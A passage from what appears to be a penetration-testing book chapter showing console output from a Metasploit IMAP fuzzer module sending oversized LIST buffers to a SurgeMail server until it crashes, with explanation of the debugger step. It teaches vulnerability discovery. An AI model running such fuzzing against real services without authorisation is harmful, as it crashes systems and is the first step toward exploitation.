background image

200

Chapter 14

The fuzzer should now be ready to go. Make sure that your debugger of 

choice (we’re using the Immunity Debugger in our examples) is attached to 
the 

surgemail.exe

 process, and start the fuzzer:

msf auxiliary(imap_fuzz) > 

run

 [*] Authenticating as test with password test...

[*] Generating fuzzed data...

[*] Sending fuzzed data, buffer length = 684
[*] 0002 LIST () "/v1AD7DnJTVykXGYYM6BmnXuYRlZNIJUzQzFPvASjYxzdTTOngBJ5gfK0XjLy3ciAAk1Fmo0

RPEpq6f4BBnp5jm3LuSbAOj1M5qULEGEv0DMk0oOPUj6XPN1VwxFpjAfFeAxykiwdDiqNwnVJAKyr6X7C5ije7
DSujURybOp6BkKWroLCzQg2AmTuqz48oNeY9CDeirNwoITfIaC40Ds9OgEDtL8WN5tL4QYdVuZQ85219Thogk7
75GVfNH4YPpSo2PLmvd5Bf2sY9YDSvDqMmjW9FXrgLoUK2rl9cvoCbTZX1zuU1dDjnJJpXDuaysDfJKbtHn9Vh
siiYhFokALiF1QI9BRwj4bo0kwZDn8jyedxhSRdU9CFlMs19CvbVnnLWeRGHScrTxpduVJZygbJcrRp6AWQqke
Y0DzI4bd7uXgTIHXN6R403ALckZgqOWcUSEWj6THI9NFAIPP1LEnctaK0uxbzjpS1ize16r388StXBGq1we7Qa
8j6xqJsN5GmnIN4HQ4W4PZIjGRHUZC8Q4ytXYEksxXe2ZUhl5Xbdhz13zW2HpxJ2AT4kRU1wDqBUkEQwvKtoeb
rfUGJ8bvjTMSxKihrDMk6BxAnY6kjFGDi5o8hcEag4tzJ1FhH9eI2UHDVbsDmUHTfAFbreJTHVlcIruAozmZKz
i7XgTaOgzGh" "PWNED"

 [*] 0002 OK LIST completed

. . . SNIP . . .

[*] Authenticating as test with password test...
[*] Generating fuzzed data...
[*] Sending fuzzed data, buffer length = 

1007

[*] 0002 LIST () "/FzwJjIcL16vW4PXDPpJbpsHB4p7Xts9fbaJYjRJASXRqbZnOMzprZfVZH7BYvcHuwlN0Yq

yfoCrJyobzOqoscJeTeRgrDQKA8MDDLbmY6WCQ6XQH9Wkj4c9JCfPjIqTndsocWBz1xLMX1VdsutJEtnceHvhl
Gqee6Djh7v3oJW4tXJMMxe8uR2NgBlKoCbH18VTR8GUFqWCmQ0970B3gR9foi6inKdWdcE6ivbOHElAiYkFYzZ
06Q5dvza58DVhn8sqSnRAmq1UlcUGuvr6r99POlrZst10r606J2B03TBGDFuy0dNMI0EUANKZ6OnCn3Zk1JL65
9MC8PZy0frCiPBqZ4xn0biAjFTH5LsCjIFuI5eZ9LsdXdek7iiOhEmW6D86mAtyg9S1a7RALrbRcLIHJpwMsEE
5LS1wIV9aFPS6RQwI4DtF4bGSle1FCyf63hy3Vo8AKkId6yu5MfjwfUExandVeUldk8c5bhlyqoDp3UX2ClQPZ
os0KpFoIcxmq8R0E3Ri54l5Yl3OPcN7U20Kb1CEAfbhxGFgh1oMzjJpuM7IbHMrZNjVADz6A0byzgiP2pXa7Zm
OloV9u6Fwa0l6sR6oL0Png9MYNwTMXTUdiE7rOjuOmkdgglPTkZ3n4de1FEaLh8Xhf9SNSPZUX0M7gmUiyNYv6
qti3Omy8qvjJOQui1IhUhf5fKOunKIcB5Zw7quznxV1GF2R5hXVTw1vlbMi5TQW68ZDFlD6q6BJ4S3oNrFCyXX
aQpAURyCoDGdjoxk1vrUPGusf3i4EIF2iqyyekWiQ7GuYcwMax3o0ZXB2djFh2dYEGyBSCHaFhpwUgamThinnM
AsDFuEY9Hq9UOQSmZ6ySunifPFjCbDs4Zooquw0HPaVnbNVo97tfVBYSei9dWCUWwUAPVJVsTGoDNRVarOrg8q
wbziv8aQaPZ7Y8r0SUiB1nNhlhl3UCVZpf8Gck0psjETf4ks356q0I3mLZkqCLkznVV4ayetVgaDm" "PWNED"

 [*] Server crashed, no response

[*] Auxiliary module execution completed
msf auxiliary(imap_fuzz) >

In this listing, the fuzzer connects and logs into the remote service at   

and generates a random string of text at  . At   the malicious request is sent 
to the server, and the reply is received and displayed at  . If the server receives 
no reply, you receive the notification at   that the server has crashed, which 
is your cue to check your debugger.

If you now check your debugger on the Windows target, you should see 

that it has paused at the point of the crash, as shown in Figure 14-1. Looking 
at the crash, we can see that no memory addresses are overwritten and that, 
unfortunately, there’s nothing really exploitable at first glance. After further 
tinkering with increasing buffer lengths, you will find that by sending an